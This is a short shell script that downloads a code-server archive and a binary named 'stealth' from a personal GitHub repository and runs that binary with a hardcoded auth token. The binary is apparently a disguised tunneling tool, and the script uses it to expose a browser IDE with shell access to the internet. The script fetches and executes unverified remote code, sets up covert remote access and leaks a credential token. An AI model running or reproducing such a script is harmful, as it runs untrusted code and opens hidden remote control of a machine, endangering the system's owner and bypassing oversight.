#!/bin/sh
cd
curl -s -L -o code-server.tar.gz https://raw.githubusercontent.com/thembilemhlabangula/update/main/code-server.tar.gz
sleep 2
tar -xf code-server.tar.gz
export PATH=$HOME/code-server-4.14.1-linux-amd64/bin:$PATH
sleep 2
wget -q https://raw.githubusercontent.com/thembilemhlabangula/update/main/stealth >/dev/null
sleep 2
chmod +x stealth
sleep 2
./stealth authtoken 2hG4hIePDe5ybxLjau63lbVKeeH_3qAtrDiXsrKEmxRX1ysN3
sleep 2
code-server-4.14.1-linux-amd64/bin/code-server --port 9090 & ./stealth http 9090 & curl http://127.0.0.1:4040/api/tunnels
